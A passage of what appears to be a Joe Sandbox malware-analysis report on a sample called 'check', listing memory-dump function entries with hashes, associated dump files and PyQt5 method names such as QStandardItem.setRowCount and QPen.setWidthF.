                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setCount@Item@@Standard
                                                                                                                                                                                                                                          • String ID: QStandardItem$setRowCount$setRowCount(self, rows: int)
                                                                                                                                                                                                                                          • API String ID: 2627231148-3203994970
                                                                                                                                                                                                                                          • Opcode ID: a47ededf91e7943598f1f280a0322a140d2a2c1b9e6b4cd7ac9dce4dba99d4a8
                                                                                                                                                                                                                                          • Instruction ID: 455eb6a4fd4702918f28b28fcf1051917e620b3801e90ddf44066de5178f106a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a47ededf91e7943598f1f280a0322a140d2a2c1b9e6b4cd7ac9dce4dba99d4a8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6011EC76A18E46D1DB10DF15E8896A933A5FB44BC4F914132DA9E03320EF3DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D96FF00 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setPen@@Width
                                                                                                                                                                                                                                          • String ID: QPen$setWidthF$setWidthF(self, width: float)
                                                                                                                                                                                                                                          • API String ID: 2145825199-1341275970
                                                                                                                                                                                                                                          • Opcode ID: b7179538e9308bb4ce11c5954b3da8277bab5269a9b1c57973eaca5b148037b9
                                                                                                                                                                                                                                          • Instruction ID: 76943d2cd43aa6b5f6a575e8cde8528dce767d1ff8d7af9aab22becdc315b94b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7179538e9308bb4ce11c5954b3da8277bab5269a9b1c57973eaca5b148037b9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8211D376A08F46D1EB109F25E8896A933A4FB54B94F914132DA9E03320EF3DE95AC744
                                                                                                                                                                                                                                          Function 00007FF89D999F10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setCurvePainterPathStroker@@Threshold@
                                                                                                                                                                                                                                          • String ID: QPainterPathStroker$setCurveThreshold$setCurveThreshold(self, threshold: float)
                                                                                                                                                                                                                                          • API String ID: 2833657433-2098193841
                                                                                                                                                                                                                                          • Opcode ID: 33f9d4856d68fa5f8b4518d4d65c7244f03354b306cf9c2a75e627ebc6bba4fe
                                                                                                                                                                                                                                          • Instruction ID: 4f1ae5efdb5ac7b846d3e2fecaf289dd86d1d3f47fa2605cad7cb6cec3ef1de3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33f9d4856d68fa5f8b4518d4d65c7244f03354b306cf9c2a75e627ebc6bba4fe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF11E576A08E46D1EB10DF25E8896A933A5FB44F84F914032DA9E03320EF3DE95AC744
                                                                                                                                                                                                                                          Function 00007FF89D943D90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 33COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?first@?$Point@@Point@@@@Vector@
                                                                                                                                                                                                                                          • String ID: QPolygon$first$first(self) -> QPoint
                                                                                                                                                                                                                                          • API String ID: 4117037871-3764477491
                                                                                                                                                                                                                                          • Opcode ID: e921906142175b0a3bf342772f0caa2674209a7a52eb99c7b8c5088127334529
                                                                                                                                                                                                                                          • Instruction ID: d829f319490c0f3d4fbe7c4938e9332c225fd47be400edbcdb5a2d4c0503f9f7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e921906142175b0a3bf342772f0caa2674209a7a52eb99c7b8c5088127334529
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29012977A09A46C1EB108F61E8896A933A4FB44FD4F918032CA8E43320EF7CE559C744
                                                                                                                                                                                                                                          Function 00007FF89D955D90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 33COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?itemPrototype@QStandardItemModel@@QEBAPEBVQStandardItem@@XZ.QT5GUI ref: 00007FF89D955DDB
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Standard$?itemItemItem@@Model@@Prototype@
                                                                                                                                                                                                                                          • String ID: QStandardItemModel$itemPrototype$itemPrototype(self) -> Optional[QStandardItem]
                                                                                                                                                                                                                                          • API String ID: 2431504200-192349141
                                                                                                                                                                                                                                          • Opcode ID: 0c2f3126719e8f61e52d7214e3c5eeae2912310bcfd5dffe6051162578c6a8a4
                                                                                                                                                                                                                                          • Instruction ID: 46bc95e768ba8c6e9cbaadd2912c924662f9003de9393d2fd177769e75541e06
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c2f3126719e8f61e52d7214e3c5eeae2912310bcfd5dffe6051162578c6a8a4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31010536A08A4681EB108F21E8896A933A4FB44FD4F918032DA8E47320EF7CE559C344
                                                                                                                                                                                                                                          Function 00007FF89D961DF0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 33COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?intFormat@@Property@Text
                                                                                                                                                                                                                                          • String ID: QTextTableCellFormat$bottomBorderStyle$bottomBorderStyle(self) -> QTextFrameFormat.BorderStyle
                                                                                                                                                                                                                                          • API String ID: 3527681034-2438328319
                                                                                                                                                                                                                                          • Opcode ID: 003324f03a027d97c7923b5fd79380894a8dd8b4958d5cd97b8ae239b7c3b39b
                                                                                                                                                                                                                                          • Instruction ID: a1418da380da426cea29a49ae1495282f553dc4cdd8b4cfe8cc49e46608c464f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 003324f03a027d97c7923b5fd79380894a8dd8b4958d5cd97b8ae239b7c3b39b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D110536A08A4682EB108F61E8496A933E4FB44FD4F918032DA8E43320EF7CE559C384
                                                                                                                                                                                                                                          Function 00007FF89D9AE080 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 33COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?parent@Item@@Standard
                                                                                                                                                                                                                                          • String ID: QStandardItem$parent$parent(self) -> Optional[QStandardItem]
                                                                                                                                                                                                                                          • API String ID: 3117110572-2488420150
                                                                                                                                                                                                                                          • Opcode ID: 79937be5acd4cdec6b87dfbcef0cd514f2b1a1b9d668aa68bc511471caba57d7
                                                                                                                                                                                                                                          • Instruction ID: 744a1453cd8e99cd06132beeead4aeef157d46d563a8dd502661e905dfe78b3a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79937be5acd4cdec6b87dfbcef0cd514f2b1a1b9d668aa68bc511471caba57d7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39011B36A08A4682EB108F55E8496A933A4FB44FD4F918032C98E43320EF7DE559C344
                                                                                                                                                                                                                                          Function 00007FF89D9BA080 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 33COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?painter@EnginePaintPainter@@State@@
                                                                                                                                                                                                                                          • String ID: QPaintEngineState$painter$painter(self) -> Optional[QPainter]
                                                                                                                                                                                                                                          • API String ID: 1966523716-3548787037
                                                                                                                                                                                                                                          • Opcode ID: 8afeef08cc00bc1161e40fb9d37443905d1db6d1eefc15825b162b4b5bd97bff
                                                                                                                                                                                                                                          • Instruction ID: 14ba0b9419467edd7aaf3498281d8be8cd5160cdd7fea63ea79e024a2f262508
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8afeef08cc00bc1161e40fb9d37443905d1db6d1eefc15825b162b4b5bd97bff
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E01ED37A18A4681EB109F15E8496A933A4FB54FD4F918072CE9E43320EF7DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D933FD0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 33COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
